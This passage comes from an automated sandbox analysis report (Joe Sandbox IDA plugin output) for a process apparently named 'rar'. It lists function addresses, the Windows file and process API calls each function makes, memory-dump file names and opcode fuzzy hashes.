                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                      • Instruction ID: 6b72018191fd94e87d0cd5b57ffee079c68c64d29d90ffaae58c8999b34bc76d
                                                                                                                                                                      • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                      • Instruction Fuzzy Hash: 57E01221A0874582EF44AB60E84137523526F64741F025838EC0E823A6CEBFE82DC356
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE754044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4052775200-0
                                                                                                                                                                      • Opcode ID: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
                                                                                                                                                                      • Instruction ID: 3bcadf87c08e8c456ed9aca1f38098b88b44267830d5b071144b09da04dd5246
                                                                                                                                                                      • Opcode Fuzzy Hash: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
                                                                                                                                                                      • Instruction Fuzzy Hash: BAE1E923A1868281EF708B24D4002BD67A1FB61794F454131FB9E876D9EFBED4A6C706
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE751AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6EE747EBE,00000000,00000000,00000000,00000000,00000007,00007FF6EE747C48), ref: 00007FF6EE751B8D
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6EE747EBE,00000000,00000000,00000000,00000000,00000007,00007FF6EE747C48), ref: 00007FF6EE751BD7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                      • Instruction ID: bd729412673db7ee726e849c702a079c5e18e902225f3b593bac9fb452f482a2
                                                                                                                                                                      • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                      • Instruction Fuzzy Hash: C6314D63A18A8546FB709F10D4053693690FB61779F114334EDAC876C5EFBEC4A5C709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE73681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 932687459-0
                                                                                                                                                                      • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                      • Instruction ID: 3fa69aed82d5fa82d01ed9666f59c717562e314bfb3db32dacc59f0aed787517
                                                                                                                                                                      • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D219353918E8582DB41CF29E1411B86360FBACB88B15A321EF4D42656EF69E5F5C301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE76915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4f6026273c0a9246411fc6740a6753b01b0e10de163d24a49de1b808aba71c52
                                                                                                                                                                      • Instruction ID: a462e5f141b21f10b8aa9ceeac9576eed0a37bc161bd39435a8d9637af55f04b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4f6026273c0a9246411fc6740a6753b01b0e10de163d24a49de1b808aba71c52
                                                                                                                                                                      • Instruction Fuzzy Hash: F911B43250AB8281EF409B54E9003A973A4EF64794F250234F69D473E6DEBDD422C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7520B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                      • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                      • Instruction ID: a6247db48d1824a1a6f55e67ffa0895ba418555e62e11e119ea6da1e22a60160
                                                                                                                                                                      • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                      • Instruction Fuzzy Hash: CC010222A1D6C542EF644B66E40023E6262EF74BA0F265630FA2D83BD4CE6EE455C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE747A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • setbuf.LIBCMT ref: 00007FF6EE747A7B
                                                                                                                                                                        • Part of subcall function 00007FF6EE792AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EE797EF3
                                                                                                                                                                      • setbuf.LIBCMT ref: 00007FF6EE747A8F
                                                                                                                                                                        • Part of subcall function 00007FF6EE747B44: GetStdHandle.KERNEL32(?,?,?,00007FF6EE747A9E), ref: 00007FF6EE747B4A
                                                                                                                                                                        • Part of subcall function 00007FF6EE747B44: GetFileType.KERNELBASE(?,?,?,00007FF6EE747A9E), ref: 00007FF6EE747B56
                                                                                                                                                                        • Part of subcall function 00007FF6EE747B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6EE747A9E), ref: 00007FF6EE747B69
                                                                                                                                                                        • Part of subcall function 00007FF6EE792ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EE792AD0
                                                                                                                                                                        • Part of subcall function 00007FF6EE792B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EE792C1C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4044681568-0
                                                                                                                                                                      • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                      • Instruction ID: d24e129626aea37349382c5e23b96d385950e42f4bd5e963407395c454517dd7
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0501B002E1E18206FF18B3B5E4A67B914828FA1310F438179F51D8A3D7DD9F2426C35B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE752440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                      • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                      • Instruction ID: e294ac3c743b7b7cdc3d7e4ad9b3ff28142027bd3b2ea61cd1681d6d7d95fb3c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                      • Instruction Fuzzy Hash: FA018E23A08682C2EF649B69E4443782360EB64778F154331F13D852E5CFAED9ABC705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7530C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000800,00007FF6EE75305D,?,?,?,?,?,?,?,?,00007FF6EE764126,?,?,?,?,00000800), ref: 00007FF6EE7530F0
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6EE764126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6EE753119
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                      • Instruction ID: 333383148a185bdc9f5f720b91e761140e2c562198370ee1bd79b59918651985
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                      • Instruction Fuzzy Hash: CFF0A422B1868181EF609B25F4443AD6250BB6C7D4F410531F9DCC379DDEAED594C609
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1175261203-0
                                                                                                                                                                      • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                      • Instruction ID: 5249407879d82bc38840a51b9a303771246944a08a44046d34e06ef3f7427254
                                                                                                                                                                      • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                      • Instruction Fuzzy Hash: 65F06823B1858145FF709B10E8153F96254FF68784F810031F9CDC269DEE6DD165C605
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77BA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1231390398-0
                                                                                                                                                                      • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                      • Instruction ID: cd5e36cedcf185fac1a7789750517dd81c3ab09a03ed711a7cef5b845be92eaf
